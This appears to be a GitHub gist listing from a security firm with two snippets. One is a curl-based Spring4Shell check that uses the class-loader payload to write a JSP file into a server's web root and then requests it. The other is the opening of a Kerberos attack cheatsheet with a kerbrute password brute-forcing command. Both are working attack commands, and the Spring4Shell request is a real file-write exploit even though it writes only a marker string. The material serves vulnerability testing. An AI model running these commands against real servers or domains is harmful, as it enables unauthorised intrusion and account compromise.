Skip to content

Instantly share code, notes, and snippets.

View TarlogicSecurity's full-sized avatar
😜
Pwning since 2011

TarlogicSecurity

😜
Pwning since 2011
View GitHub Profile
@TarlogicSecurity
TarlogicSecurity / spring4shell.sh
Created March 31, 2022 12:32
Testing for Spring4Shell
curl -v -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20Tarlogic 2022%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tarlogicCheckSpring4Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" http://YOURSERVER/
curl http://YOURSERVER/tarlogicCheckSpring4Shell.jsp
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: